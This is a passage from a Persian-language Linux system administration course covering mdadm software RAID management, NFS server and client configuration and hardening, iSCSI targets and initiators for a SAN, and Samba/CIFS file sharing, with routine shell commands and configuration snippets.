۶.۳ اضافه کردن به /etc/fstab برای ماندگاری در بوت

echo "/dev/md0 /mnt/raid0 ext4 defaults 0 0" >> /etc/fstab

---

۷. ذخیره و بازیابی تنظیمات RAID

۷.۱ ذخیره تنظیمات RAID در mdadm.conf

mdadm --detail --scan >> /etc/mdadm/mdadm.conf

۷.۲ بازیابی RAID در هنگام بوت

mdadm --assemble --scan

---

۸. اضافه کردن و جایگزینی دیسک‌ها در RAID

۸.۱ اضافه کردن یک دیسک جدید به RAID 1 پس از خرابی

mdadm --add /dev/md1 /dev/sdd

۸.۲ جایگزینی دیسک خراب در RAID 5

mdadm --fail /dev/md5 /dev/sdb
mdadm --remove /dev/md5 /dev/sdb
mdadm --add /dev/md5 /dev/sdf

۸.۳ بررسی فرآیند بازسازی (Resyncing)

cat /proc/mdstat

---

۹. حذف یک آرایه RAID و بازگردانی دیسک‌ها

۹.۱ توقف RAID

umount /mnt/raid1
mdadm --stop /dev/md1

۹.۲ حذف RAID و پاک کردن سوپر بلاک (Superblock)

mdadm --zero-superblock /dev/sdb /dev/sdc

۹.۳ حذف RAID از /etc/mdadm/mdadm.conf

nano /etc/mdadm/mdadm.conf
# خط مربوط به RAID موردنظر را حذف کنید

---

جمع‌بندی

• mdadm ابزار استاندارد مدیریت RAID در لینوکس است و امکان ایجاد، نظارت و مدیریت RAID را فراهم می‌کند.
• RAID 0 برای افزایش سرعت، RAID 1 برای افزونگی، RAID 5 برای تعادل و RAID 10 برای ترکیب سرعت و افزونگی استفاده می‌شوند.
• پس از ایجاد RAID، اضافه کردن آن به /etc/fstab برای ماندگاری در بوت ضروری است.
• نظارت مداوم بر RAID و جایگزینی سریع دیسک‌های معیوب برای جلوگیری از از دست رفتن داده‌ها اهمیت بالایی دارد.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”مدیریت Array‌ها و تغییرات در RAID با mdadm” subtitle=”توضیحات کامل”]مدیریت آرایه‌های RAID شامل اضافه کردن دیسک جدید، حذف دیسک معیوب، افزایش ظرفیت آرایه و تغییر سطوح RAID است. ابزار mdadm به‌عنوان استاندارد مدیریت RAID نرم‌افزاری در لینوکس، این امکان را فراهم می‌کند که بدون از دست رفتن داده‌ها، تغییرات موردنیاز را اعمال کنیم.

---

۱. بررسی وضعیت فعلی آرایه RAID

۱.۱ مشاهده وضعیت کلی RAID

cat /proc/mdstat

۱.۲ نمایش جزئیات آرایه RAID

mdadm --detail /dev/md0

۱.۳ بررسی وضعیت هر دیسک در آرایه

mdadm --examine /dev/sdb /dev/sdc /dev/sdd

---

۲. اضافه کردن دیسک جدید به RAID

۲.۱ اضافه کردن دیسک جدید به RAID 1

mdadm --add /dev/md1 /dev/sdd

۲.۲ اضافه کردن دیسک جدید به RAID 5

mdadm --add /dev/md5 /dev/sde

۲.۳ بررسی وضعیت بازسازی پس از اضافه کردن دیسک

cat /proc/mdstat

---

۳. حذف و جایگزینی دیسک معیوب در RAID

۳.۱ علامت‌گذاری دیسک خراب در RAID 1

mdadm --fail /dev/md1 /dev/sdb

۳.۲ حذف دیسک خراب از RAID 1

mdadm --remove /dev/md1 /dev/sdb

۳.۳ اضافه کردن دیسک جایگزین جدید به RAID 1

mdadm --add /dev/md1 /dev/sdf

۳.۴ حذف دیسک خراب و جایگزینی در RAID 5

mdadm --fail /dev/md5 /dev/sdc
mdadm --remove /dev/md5 /dev/sdc
mdadm --add /dev/md5 /dev/sdg

---

۴. افزایش ظرفیت RAID بدون از دست دادن داده‌ها

۴.۱ افزایش ظرفیت RAID 1 با یک دیسک جدید

mdadm --add /dev/md1 /dev/sdf
mdadm --grow /dev/md1 --raid-devices=3

۴.۲ افزایش ظرفیت RAID 5 با یک دیسک جدید

mdadm --add /dev/md5 /dev/sdg
mdadm --grow /dev/md5 --raid-devices=4

۴.۳ بررسی روند بازسازی پس از افزایش ظرفیت

cat /proc/mdstat

---

۵. تغییر سطح RAID بدون از بین رفتن داده‌ها

۵.۱ تغییر RAID 1 به RAID 5 (از دو دیسک به سه دیسک)

mdadm --grow /dev/md1 --level=5 --raid-devices=3

۵.۲ تغییر RAID 5 به RAID 6 برای افزایش افزونگی

mdadm --grow /dev/md5 --level=6 --raid-devices=4

---

۶. حذف و توقف آرایه RAID

۶.۱ آن‌مونت کردن آرایه

umount /mnt/raid1

۶.۲ توقف RAID

mdadm --stop /dev/md1

۶.۳ حذف اطلاعات RAID از دیسک‌ها

mdadm --zero-superblock /dev/sdb /dev/sdc

۶.۴ حذف RAID از mdadm.conf

nano /etc/mdadm/mdadm.conf
# خط مربوط به آرایه RAID موردنظر را حذف کنید

---

۷. ذخیره تغییرات و پایداری در بوت

۷.۱ ذخیره تغییرات در mdadm.conf

mdadm --detail --scan >> /etc/mdadm/mdadm.conf

۷.۲ بازیابی RAID هنگام بوت

mdadm --assemble --scan

---

جمع‌بندی

• mdadm امکان مدیریت انعطاف‌پذیر RAID را بدون از دست رفتن داده‌ها فراهم می‌کند.
• اضافه کردن، حذف و جایگزینی دیسک‌ها در RAID باید با دقت انجام شود تا از خرابی داده‌ها جلوگیری شود.
• تغییر سطح RAID مانند افزایش ظرفیت یا تبدیل RAID 5 به RAID 6 نیازمند هماهنگی و زمان‌بندی مناسب است.
• ذخیره تنظیمات در mdadm.conf برای پایداری پس از بوت ضروری است.

[/cdb_course_lesson][cdb_course_lesson title=”فصل 5. پروتکل‌های ذخیره‌سازی شبکه‌ای”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”نحوه پیکربندی NFS Server و Client در لینوکس” subtitle=”توضیحات کامل”]NFS (Network File System) یک پروتکل اشتراک‌گذاری فایل در شبکه است که امکان دسترسی به فایل‌ها و دایرکتوری‌ها را به‌صورت ریموت و شبیه به فایل‌های محلی فراهم می‌کند. این سیستم بیشتر در محیط‌های سروری و شبکه‌ای برای اشتراک‌گذاری داده‌ها بین کلاینت‌های مختلف استفاده می‌شود.

---

۱. نصب و راه‌اندازی NFS Server

۱.۱ نصب پکیج‌های موردنیاز در سرور (Ubuntu/Debian)

apt update
apt install -y nfs-kernel-server

۱.۲ نصب پکیج‌های موردنیاز در سرور (CentOS/RHEL)

yum install -y nfs-utils

---

۲. ایجاد و تنظیم دایرکتوری اشتراک‌گذاری در NFS Server

۲.۱ ایجاد دایرکتوری برای اشتراک‌گذاری

mkdir -p /mnt/nfs_share

۲.۲ تنظیم سطح دسترسی مناسب

chown -R nobody:nogroup /mnt/nfs_share
chmod 777 /mnt/nfs_share

۲.۳ تنظیم مسیر اشتراک‌گذاری در فایل تنظیمات /etc/exports

nano /etc/exports

افزودن خط زیر در فایل /etc/exports برای اشتراک‌گذاری دایرکتوری

/mnt/nfs_share 192.168.1.0/24(rw,sync,no_subtree_check)

گزینه‌های استفاده شده:

• rw → دسترسی خواندن و نوشتن
• sync → تضمین می‌کند که داده‌ها قبل از ارسال به کلاینت‌ها در دیسک ذخیره شوند
• no_subtree_check → بهبود عملکرد و کاهش مشکلات مجوزها

۲.۴ اعمال تغییرات و راه‌اندازی مجدد سرویس NFS

exportfs -a
systemctl restart nfs-server

۲.۵ فعال‌سازی سرویس NFS در بوت سیستم

systemctl enable nfs-server

۲.۶ بررسی وضعیت سرویس NFS

systemctl status nfs-server

---

۳. تنظیمات فایروال در NFS Server

۳.۱ باز کردن پورت‌های موردنیاز در فایروال (Ubuntu/Debian)

ufw allow from 192.168.1.0/24 to any port nfs
ufw enable

۳.۲ باز کردن پورت‌های موردنیاز در فایروال (CentOS/RHEL)

firewall-cmd --permanent --add-service=nfs
firewall-cmd --reload

---

۴. پیکربندی NFS Client

۴.۱ نصب پکیج‌های موردنیاز در کلاینت (Ubuntu/Debian)

apt install -y nfs-common

۴.۲ نصب پکیج‌های موردنیاز در کلاینت (CentOS/RHEL)

yum install -y nfs-utils

۴.۳ ایجاد دایرکتوری برای اتصال به NFS Server

mkdir -p /mnt/nfs_client

۴.۴ اتصال کلاینت به NFS Server به‌صورت موقت

mount -t nfs 192.168.1.10:/mnt/nfs_share /mnt/nfs_client

در اینجا 192.168.1.10 آدرس سرور NFS است.

۴.۵ بررسی صحت اتصال NFS در کلاینت

df -h | grep nfs

۴.۶ تنظیم اتصال دائمی NFS در کلاینت (ویرایش /etc/fstab)

nano /etc/fstab

افزودن خط زیر در فایل /etc/fstab برای اتصال خودکار در هنگام بوت:

192.168.1.10:/mnt/nfs_share /mnt/nfs_client nfs defaults 0 0

۴.۷ بررسی عملکرد و انتقال فایل آزمایشی

touch /mnt/nfs_client/testfile.txt
ls -l /mnt/nfs_client

---

۵. حذف و قطع اتصال از NFS Server

۵.۱ جدا کردن دایرکتوری NFS از کلاینت به‌صورت موقت

umount /mnt/nfs_client

۵.۲ حذف ورودی NFS از /etc/fstab برای جلوگیری از اتصال خودکار

nano /etc/fstab

خط مربوط به NFS را حذف کنید.

۵.۳ توقف سرویس NFS در سرور

systemctl stop nfs-server

۵.۴ غیرفعال کردن سرویس NFS در بوت سیستم

systemctl disable nfs-server

---

جمع‌بندی

• NFS به‌عنوان یک راهکار پرکاربرد برای اشتراک‌گذاری فایل‌ها در شبکه استفاده می‌شود.
• برای راه‌اندازی NFS Server، ابتدا پکیج‌ها نصب شده و مسیر اشتراک‌گذاری در /etc/exports تعریف می‌شود.
• در کلاینت‌ها نیز با نصب nfs-common و تنظیم /etc/fstab می‌توان اتصال دائمی ایجاد کرد.
• مدیریت صحیح دسترسی‌ها و تنظیمات فایروال در سرور و کلاینت ضروری است.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”تنظیمات امنیتی و دسترسی‌ها در NFS” subtitle=”توضیحات کامل”]NFS به‌طور پیش‌فرض برای شبکه‌های داخلی طراحی شده و دارای ویژگی‌های امنیتی محدودی است. برای استفاده ایمن از این پروتکل در محیط‌های تولیدی، باید اقداماتی مانند کنترل سطح دسترسی، تنظیم فایروال، استفاده از رمزگذاری و احراز هویت را در نظر گرفت.

---

۱. محدود کردن دسترسی کلاینت‌ها در NFS Server

۱.۱ محدود کردن دسترسی در فایل /etc/exports

فایل /etc/exports کنترل می‌کند که چه کلاینت‌هایی مجاز به دسترسی به دایرکتوری‌های اشتراک‌گذاری شده هستند. برای افزایش امنیت، بهتر است دسترسی فقط به IPهای خاص یا یک زیرشبکه خاص داده شود.

nano /etc/exports

نمونه تنظیمات برای مجاز کردن دسترسی فقط به کلاینت‌های خاص:

/mnt/nfs_share 192.168.1.100(rw,sync,no_root_squash)
/mnt/nfs_secure 192.168.1.0/24(rw,sync,root_squash,no_subtree_check)

توضیحات:

• 192.168.1.100 → فقط این کلاینت اجازه دسترسی به /mnt/nfs_share را دارد.
• 192.168.1.0/24 → تمام کلاینت‌های این زیرشبکه اجازه دسترسی به /mnt/nfs_secure را دارند.
• rw → مجوز خواندن و نوشتن را می‌دهد.
• sync → تضمین می‌کند که تمام داده‌ها قبل از ارسال به کلاینت‌ها روی دیسک ذخیره شوند.
• root_squash → سطح دسترسی root را به کاربر nobody کاهش می‌دهد تا امنیت افزایش یابد.
• no_root_squash → به کاربر root کلاینت اجازه دسترسی سطح root را می‌دهد (پیشنهاد نمی‌شود).
• no_subtree_check → بهبود عملکرد و کاهش مشکلات مجوزها.

۱.۲ اعمال تغییرات در تنظیمات NFS

پس از ویرایش فایل /etc/exports، تغییرات باید اعمال شوند:

exportfs -ra
systemctl restart nfs-server

---

۲. تنظیم مجوزها و مالکیت فایل‌ها

۲.۱ تعیین مالکیت مناسب دایرکتوری اشتراک‌گذاری

chown -R nobody:nogroup /mnt/nfs_secure
chmod -R 750 /mnt/nfs_secure

توضیحات:

• 750 → مالک (root) دارای مجوز خواندن، نوشتن و اجرا است، گروه فقط مجوز خواندن و اجرا دارد، و سایر کاربران هیچ دسترسی ندارند.

۲.۲ تنظیم ACL برای کنترل دقیق‌تر دسترسی‌ها

اگر به کنترل سطح دسترسی دقیق‌تر نیاز باشد، می‌توان از ACL (Access Control List) استفاده کرد:

setfacl -m u:username:rwx /mnt/nfs_secure
setfacl -m g:groupname:rx /mnt/nfs_secure

---

۳. تنظیم فایروال برای محدود کردن دسترسی NFS

۳.۱ اجازه دادن به NFS فقط برای کلاینت‌های مجاز (Ubuntu/Debian)

ufw allow from 192.168.1.0/24 to any port nfs
ufw enable

۳.۲ اجازه دادن به NFS فقط برای کلاینت‌های مجاز (CentOS/RHEL)

firewall-cmd --permanent --add-service=nfs
firewall-cmd --permanent --add-service=rpc-bind
firewall-cmd --permanent --add-service=mountd
firewall-cmd --reload

---

۴. فعال‌سازی احراز هویت Kerberos برای امنیت بیشتر

۴.۱ نصب Kerberos در سرور NFS

apt install -y nfs-kernel-server krb5-user libnfsidmap2 nfs-common

۴.۲ تنظیمات Kerberos در NFS

فایل /etc/exports را ویرایش کنید و گزینه‌های sec=krb5 یا sec=krb5p را اضافه کنید:

/mnt/nfs_secure 192.168.1.0/24(rw,sync,sec=krb5p)

انواع احراز هویت Kerberos:

• sec=krb5 → احراز هویت کاربران قبل از دسترسی به NFS
• sec=krb5i → احراز هویت به همراه تضمین صحت داده‌ها
• sec=krb5p → احراز هویت به همراه رمزگذاری کامل داده‌ها

---

۵. مانیتورینگ و بررسی امنیتی NFS

۵.۱ بررسی کلاینت‌های متصل به NFS Server

showmount -a

۵.۲ بررسی گزارشات لاگ NFS برای شناسایی فعالیت‌های مشکوک

journalctl -u nfs-server --since "1 hour ago"

---

جمع‌بندی

• دسترسی به NFS باید فقط برای کلاینت‌های مجاز از طریق تنظیمات /etc/exports محدود شود.
• استفاده از root_squash برای جلوگیری از دسترسی root کلاینت‌ها پیشنهاد می‌شود.
• تنظیم فایروال برای بستن دسترسی‌های غیرمجاز ضروری است.
• احراز هویت Kerberos برای افزایش امنیت و رمزگذاری داده‌ها توصیه می‌شود.
• بررسی مداوم کلاینت‌های متصل و مانیتورینگ لاگ‌ها می‌تواند به شناسایی حملات احتمالی کمک کند.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”استفاده از NFS در محیط‌های توزیع‌شده” subtitle=”توضیحات کامل”]NFS (Network File System) یکی از پرکاربردترین روش‌های به‌اشتراک‌گذاری فایل‌ها در محیط‌های توزیع‌شده است که امکان دسترسی چندین کلاینت به فایل‌های مشترک را از طریق شبکه فراهم می‌کند. در این بخش، نحوه پیکربندی NFS برای محیط‌های توزیع‌شده، بهینه‌سازی عملکرد، و مدیریت دسترسی‌ها بررسی خواهد شد.

---

۱. طراحی معماری NFS در محیط‌های توزیع‌شده

۱.۱ معماری متمرکز (Single NFS Server)

در این مدل، یک سرور NFS اصلی برای تمام کلاینت‌ها به‌عنوان نقطه مرکزی ذخیره‌سازی داده عمل می‌کند.

✅ مزایا:

• پیاده‌سازی ساده
• مدیریت متمرکز داده‌ها

❌ معایب:

• مشکل تک‌نقطه شکست (Single Point of Failure)
• فشار زیاد روی سرور NFS

۱.۲ معماری چندسروری (Multiple NFS Servers)

در این مدل، چندین سرور NFS با توزیع بار بین کلاینت‌ها پیاده‌سازی می‌شوند. این روش با Load Balancer یا NFS Failover پیاده‌سازی می‌شود.

✅ مزایا:

• افزایش مقیاس‌پذیری
• جلوگیری از مشکل تک‌نقطه شکست

❌ معایب:

• پیچیدگی در مدیریت فایل‌ها و همگام‌سازی داده‌ها

---

۲. راه‌اندازی NFS برای محیط‌های توزیع‌شده

۲.۱ نصب NFS روی سرور و کلاینت‌ها

روی سرور NFS:

apt update && apt install -y nfs-kernel-server

روی کلاینت‌های NFS:

apt update && apt install -y nfs-common

۲.۲ ایجاد دایرکتوری اشتراک‌گذاری

mkdir -p /mnt/nfs_share
chown nobody:nogroup /mnt/nfs_share
chmod 777 /mnt/nfs_share

۲.۳ تنظیمات اشتراک‌گذاری در سرور NFS

فایل /etc/exports را ویرایش کنید:

nano /etc/exports

محتویات:

/mnt/nfs_share 192.168.1.0/24(rw,sync,no_root_squash,no_subtree_check)

اعمال تغییرات:

exportfs -ra
systemctl restart nfs-server

۲.۴ تنظیمات در کلاینت‌های NFS

برای اتصال کلاینت‌ها:

mkdir -p /mnt/nfs_client
mount -t nfs 192.168.1.10:/mnt/nfs_share /mnt/nfs_client

برای اتصال دائمی، فایل /etc/fstab را ویرایش کنید:

nano /etc/fstab

اضافه کردن این خط:

192.168.1.10:/mnt/nfs_share /mnt/nfs_client nfs defaults 0 0

---

۳. افزایش کارایی NFS در محیط‌های توزیع‌شده

۳.۱ فعال‌سازی کش محلی در کلاینت‌ها

برای بهبود عملکرد، می‌توان fs-cache را فعال کرد:

echo "OPTIONS=\"-fsc\"" >> /etc/default/nfs-common
systemctl restart nfs-client.target

۳.۲ افزایش تعداد پردازش‌های سرور NFS

افزایش مقدار پردازش‌های NFS برای مدیریت کلاینت‌های بیشتر:

echo "RPCNFSDCOUNT=16" >> /etc/default/nfs-kernel-server
systemctl restart nfs-server

۳.۳ استفاده از NFS over RDMA برای بهبود کارایی

اگر سخت‌افزار شما از RDMA (Remote Direct Memory Access) پشتیبانی می‌کند، می‌توانید از NFS over RDMA برای افزایش سرعت استفاده کنید:

mount -o rdma,port=20049 192.168.1.10:/mnt/nfs_share /mnt/nfs_client

---

۴. افزایش امنیت در NFS توزیع‌شده

۴.۱ محدود کردن دسترسی کلاینت‌ها

فایل /etc/exports باید شامل آی‌پی‌های مشخصی باشد تا فقط کلاینت‌های مجاز بتوانند متصل شوند:

/mnt/nfs_share 192.168.1.100(rw,sync,root_squash,no_subtree_check)
/mnt/nfs_share 192.168.1.101(rw,sync,root_squash,no_subtree_check)

اعمال تغییرات:

exportfs -ra

۴.۲ فایروال برای محدود کردن دسترسی‌ها

در Ubuntu/Debian:

ufw allow from 192.168.1.0/24 to any port nfs
ufw enable

در CentOS/RHEL:

firewall-cmd --permanent --add-service=nfs
firewall-cmd --permanent --add-service=rpc-bind
firewall-cmd --permanent --add-service=mountd
firewall-cmd --reload

۴.۳ استفاده از Kerberos برای احراز هویت کلاینت‌ها

در /etc/exports این گزینه را اضافه کنید:

/mnt/nfs_secure 192.168.1.0/24(rw,sync,sec=krb5p)

سپس سرویس NFS را ری‌استارت کنید:

systemctl restart nfs-server

---

۵. مانیتورینگ و رفع اشکال در NFS

۵.۱ بررسی وضعیت سرویس NFS

systemctl status nfs-server

۵.۲ بررسی کلاینت‌های متصل

showmount -a

۵.۳ بررسی لاگ‌های خطا

journalctl -u nfs-server --since "1 hour ago"

---

جمع‌بندی

• NFS در محیط‌های توزیع‌شده می‌تواند به‌صورت متمرکز (یک سرور) یا توزیع‌شده (چند سرور) پیاده‌سازی شود.
• استفاده از کش محلی، افزایش پردازش‌های سرور، و NFS over RDMA می‌تواند کارایی را افزایش دهد.
• برای امنیت، محدود کردن آی‌پی‌های مجاز، استفاده از Kerberos، و تنظیم فایروال الزامی است.
• مانیتورینگ کلاینت‌ها و بررسی لاگ‌ها برای جلوگیری از مشکلات احتمالی ضروری است.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”پیکربندی iSCSI Targets و Initiators” subtitle=”توضیحات کامل”]iSCSI (Internet Small Computer Systems Interface) یک پروتکل مبتنی بر شبکه است که به دستگاه‌های ذخیره‌سازی اجازه می‌دهد تا از طریق شبکه IP در دسترس سرورها (Initiators) قرار بگیرند. این فناوری در محیط‌های سازمانی برای SAN (Storage Area Network) بسیار پرکاربرد است. در این بخش، مراحل نصب، پیکربندی و مدیریت iSCSI Target و iSCSI Initiator ارائه می‌شود.

---

۱. مفاهیم اصلی iSCSI

۱.۱ iSCSI Target

سروری که فضای ذخیره‌سازی را از طریق iSCSI در اختیار کلاینت‌ها قرار می‌دهد.

۱.۲ iSCSI Initiator

کلاینتی که به iSCSI Target متصل شده و مانند یک دیسک محلی از آن استفاده می‌کند.

۱.۳ IQN (iSCSI Qualified Name)

یک شناسه یکتا که برای شناسایی iSCSI Target و Initiator در شبکه استفاده می‌شود.

---

۲. نصب iSCSI Target و Initiator

۲.۱ نصب iSCSI Target روی سرور (Ubuntu/Debian)

apt update && apt install -y tgt

۲.۲ نصب iSCSI Initiator روی کلاینت (Ubuntu/Debian)

apt update && apt install -y open-iscsi

---

۳. پیکربندی iSCSI Target

۳.۱ ایجاد یک دیسک مجازی برای اشتراک‌گذاری از طریق iSCSI

dd if=/dev/zero of=/var/iscsi_disks/disk1.img bs=1G count=10
mkfs.ext4 /var/iscsi_disks/disk1.img

۳.۲ تعریف یک Target در فایل پیکربندی

ویرایش فایل /etc/tgt/conf.d/iscsi.conf:

nano /etc/tgt/conf.d/iscsi.conf

اضافه کردن پیکربندی زیر:

<target iqn.2025-03.local.iscsi:disk1>
    backing-store /var/iscsi_disks/disk1.img
    initiator-address 192.168.1.100
    incominguser iscsiuser iscsi_password
    outgoinguser iscsiuser iscsi_password
</target>

۳.۳ راه‌اندازی مجدد سرویس iSCSI Target

systemctl restart tgt

۳.۴ بررسی وضعیت Target‌ها

tgtadm --mode target --op show

---

۴. پیکربندی iSCSI Initiator (کلاینت)

۴.۱ فعال‌سازی iSCSI Initiator

systemctl enable --now open-iscsi

۴.۲ جستجوی Targetهای موجود

iscsiadm -m discovery -t sendtargets -p 192.168.1.10

۴.۳ اضافه کردن و احراز هویت

iscsiadm -m node -T iqn.2025-03.local.iscsi:disk1 -p 192.168.1.10 --login

۴.۴ بررسی اتصال دیسک iSCSI

lsblk

---

۵. فرمت و مانت کردن دیسک در کلاینت

۵.۱ فرمت دیسک iSCSI در کلاینت

mkfs.ext4 /dev/sdb

۵.۲ ایجاد نقطه مونت و سوار کردن دیسک

mkdir -p /mnt/iscsi_disk
mount /dev/sdb /mnt/iscsi_disk

۵.۳ اضافه کردن به /etc/fstab برای مانت دائمی

nano /etc/fstab

اضافه کردن این خط:

/dev/sdb /mnt/iscsi_disk ext4 defaults,_netdev 0 0

---

۶. مدیریت و نگهداری iSCSI

۶.۱ بررسی وضعیت اتصال iSCSI

iscsiadm -m session

۶.۲ قطع اتصال از Target

iscsiadm -m node -T iqn.2025-03.local.iscsi:disk1 -p 192.168.1.10 --logout

۶.۳ حذف یک Target از کلاینت

iscsiadm -m node -o delete -T iqn.2025-03.local.iscsi:disk1

---

جمع‌بندی

• iSCSI یک راهکار قوی برای اشتراک‌گذاری فضای ذخیره‌سازی در محیط‌های شبکه‌ای است.
• Target روی سرور iSCSI پیکربندی شده و از طریق شبکه به Initiator متصل می‌شود.
• مدیریت و مانیتورینگ iSCSI برای حفظ کارایی و جلوگیری از خطاهای احتمالی ضروری است.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”راه‌اندازی SAN با استفاده از iSCSI” subtitle=”توضیحات کامل”]Storage Area Network (SAN) یک شبکه اختصاصی برای ذخیره‌سازی داده‌ها است که به دستگاه‌های مختلف اجازه می‌دهد تا به یک فضای ذخیره‌سازی مشترک متصل شوند. یکی از روش‌های پیاده‌سازی SAN، استفاده از iSCSI (Internet Small Computer Systems Interface) است که از پروتکل TCP/IP برای ارتباط بین سرورها و دستگاه‌های ذخیره‌سازی استفاده می‌کند.

در این بخش، راه‌اندازی یک SAN مبتنی بر iSCSI شامل پیکربندی iSCSI Target (سرور ذخیره‌سازی) و iSCSI Initiator (کلاینت‌های متصل‌شونده) آموزش داده می‌شود.

---

۱. نصب و راه‌اندازی iSCSI Target

۱.۱ نصب بسته‌های موردنیاز روی سرور SAN (Ubuntu/Debian)

apt update && apt install -y tgt

۱.۲ ایجاد یک دیسک مجازی برای استفاده در SAN

mkdir -p /var/iscsi_disks
dd if=/dev/zero of=/var/iscsi_disks/san_disk.img bs=1G count=50
mkfs.ext4 /var/iscsi_disks/san_disk.img

۱.۳ ویرایش پیکربندی iSCSI Target

nano /etc/tgt/conf.d/san.conf

اضافه کردن پیکربندی زیر:

<target iqn.2025-03.local.san:disk1>
    backing-store /var/iscsi_disks/san_disk.img
    initiator-address 192.168.1.0/24
    incominguser iscsiuser sanpassword
</target>

۱.۴ راه‌اندازی مجدد سرویس iSCSI Target

systemctl restart tgt

۱.۵ بررسی وضعیت Target‌های موجود

tgtadm --mode target --op show

---

۲. پیکربندی iSCSI Initiator (کلاینت SAN)

۲.۱ نصب بسته‌های موردنیاز روی کلاینت‌ها (Ubuntu/Debian)

apt update && apt install -y open-iscsi

۲.۲ فعال‌سازی و شروع سرویس iSCSI

systemctl enable --now open-iscsi

۲.۳ کشف Targetهای موجود در شبکه

iscsiadm -m discovery -t sendtargets -p 192.168.1.10

۲.۴ احراز هویت و اتصال به Target

iscsiadm -m node -T iqn.2025-03.local.san:disk1 -p 192.168.1.10 --login

۲.۵ بررسی دیسک iSCSI متصل‌شده

lsblk

---

۳. پارتیشن‌بندی، فرمت و مانت کردن فضای ذخیره‌سازی SAN

۳.۱ ایجاد پارتیشن روی دیسک iSCSI

fdisk /dev/sdb

مراحل داخل fdisk:

1. فشار دادن n برای ایجاد یک پارتیشن جدید
2. انتخاب p برای پارتیشن Primary
3. فشردن Enter برای مقدار پیش‌فرض
4. فشردن w برای ذخیره تغییرات

۳.۲ فرمت پارتیشن جدید با ext4

mkfs.ext4 /dev/sdb1

۳.۳ ایجاد دایرکتوری برای مانت و سوار کردن دیسک SAN

mkdir -p /mnt/san_storage
mount /dev/sdb1 /mnt/san_storage

۳.۴ اضافه کردن به /etc/fstab برای مانت دائمی

nano /etc/fstab

اضافه کردن خط زیر:

/dev/sdb1 /mnt/san_storage ext4 defaults,_netdev 0 0

---

۴. مدیریت و نگهداری SAN مبتنی بر iSCSI

۴.۱ بررسی وضعیت اتصال به iSCSI SAN

iscsiadm -m session

۴.۲ قطع اتصال از iSCSI Target

iscsiadm -m node -T iqn.2025-03.local.san:disk1 -p 192.168.1.10 --logout

۴.۳ حذف یک Target از کلاینت

iscsiadm -m node -o delete -T iqn.2025-03.local.san:disk1

۴.۴ بررسی وضعیت Target‌ها روی سرور

tgtadm --mode target --op show

---

جمع‌بندی

• iSCSI به عنوان یک فناوری پرکاربرد برای راه‌اندازی SAN استفاده می‌شود.
• iSCSI Target روی سرور پیاده‌سازی شده و فضای ذخیره‌سازی را به کلاینت‌های شبکه ارائه می‌دهد.
• iSCSI Initiator کلاینت‌ها را قادر می‌سازد تا به Target متصل شده و از دیسک SAN به عنوان یک دیسک محلی استفاده کنند.
• مدیریت و مانیتورینگ Target‌ها و Initiator‌ها برای حفظ عملکرد و جلوگیری از خطا ضروری است.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” title=”CIFS/SMB: کار با پروتکل‌های فایل شبکه‌ای در سیستم‌های مختلف” subtitle=”توضیحات کامل”]CIFS (Common Internet File System) و SMB (Server Message Block) دو پروتکل محبوب برای به اشتراک‌گذاری فایل‌ها، پرینترها و منابع شبکه‌ای بین سیستم‌های مختلف هستند. SMB نسخه‌ی بهبودیافته‌ی CIFS است که توسط مایکروسافت توسعه داده شده و در محیط‌های ویندوز و لینوکس به‌طور گسترده استفاده می‌شود.

در این بخش، راه‌اندازی یک سرور SMB/CIFS، مدیریت اشتراک‌گذاری‌ها، کنترل دسترسی‌ها و پیکربندی کلاینت‌ها در لینوکس و ویندوز آموزش داده می‌شود.

---

۱. نصب و پیکربندی سرور SMB در لینوکس (Ubuntu/Debian)

۱.۱ نصب بسته‌های موردنیاز

apt update && apt install -y samba

۱.۲ ایجاد یک دایرکتوری برای اشتراک‌گذاری فایل‌ها

mkdir -p /srv/smb/shared
chmod 777 /srv/smb/shared

۱.۳ تنظیمات فایل پیکربندی Samba

nano /etc/samba/smb.conf

اضافه کردن بخش زیر:

[Shared]
    path = /srv/smb/shared
    browsable = yes
    writable = yes
    guest ok = yes
    create mask = 0777
    directory mask = 0777

۱.۴ راه‌اندازی مجدد سرویس Samba

systemctl restart smbd

۱.۵ بررسی وضعیت سرویس Samba

systemctl status smbd

۱.۶ فعال‌سازی Samba در استارتاپ سیستم

systemctl enable smbd

---

۲. افزودن کاربران به Samba (دسترسی احراز هویت‌شده)

۲.۱ ایجاد یک کاربر در سیستم لینوکس

useradd -M -s /sbin/nologin smbuser

۲.۲ تنظیم رمز عبور برای کاربر Samba

smbpasswd -a smbuser

۲.۳ ویرایش smb.conf برای محدود کردن دسترسی به کاربران خاص

nano /etc/samba/smb.conf

اضافه کردن تغییرات:

[Shared]
    path = /srv/smb/shared
    browsable = yes
    writable = yes
    guest ok = no
    valid users = smbuser
    create mask = 0770
    directory mask = 0770

۲.۴ راه‌اندازی مجدد Samba برای اعمال تغییرات

systemctl restart smbd

---

۳. پیکربندی کلاینت‌های SMB/CIFS در لینوکس

۳.۱ نصب بسته‌های موردنیاز

apt install -y cifs-utils

۳.۲ مانت کردن اشتراک SMB به‌صورت دستی

mount -t cifs -o username=smbuser,password=yourpassword //192.168.1.10/Shared /mnt

۳.۳ اضافه کردن به /etc/fstab برای مانت خودکار در بوت

nano /etc/fstab

اضافه کردن خط زیر:

//192.168.1.10/Shared /mnt cifs username=smbuser,password=yourpassword,iocharset=utf8 0 0

۳.۴ بررسی اتصال و دسترسی به فایل‌ها

ls -lah /mnt

۳.۵ قطع اتصال اشتراک SMB

umount /mnt

---

۴. پیکربندی کلاینت‌های SMB/CIFS در ویندوز

۴.۱ اتصال به اشتراک SMB از File Explorer

۱. کلید Win + R را فشار دهید.
۲. دستور زیر را تایپ کنید و Enter بزنید:

\\192.168.1.10\Shared

۳. نام کاربری و رمز عبور Samba را وارد کنید.
۴. اشتراک SMB نمایش داده خواهد شد.

۴.۲ مانت کردن اشتراک SMB به‌عنوان یک درایو در ویندوز

۱. در File Explorer، روی This PC کلیک کنید.
